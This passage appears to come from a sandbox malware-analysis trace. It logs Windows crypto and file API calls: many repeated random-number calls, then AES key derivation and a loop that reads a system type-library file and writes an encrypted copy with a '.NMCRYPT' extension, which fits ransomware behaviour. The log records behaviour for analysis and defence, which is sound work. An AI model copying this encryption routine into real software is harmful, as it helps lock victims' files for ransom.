hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.599] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.600] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.623] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0167.623] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0167.623] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0167.623] CryptHashData (hHash=0x9ad438, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.623] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad7f8) returned 1 [0167.623] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0167.623] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0167.623] wcslen (_String="\\\\?\\") returned 0x4 [0167.623] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad278) returned 1 [0167.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0167.624] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0167.624] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=71168) returned 1 [0167.624] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0167.625] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.626] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.626] GetLastError () returned 0x0 [0167.626] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.745] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.745] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.745] GetLastError () returned 0x0 [0167.745] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.745] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.745] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 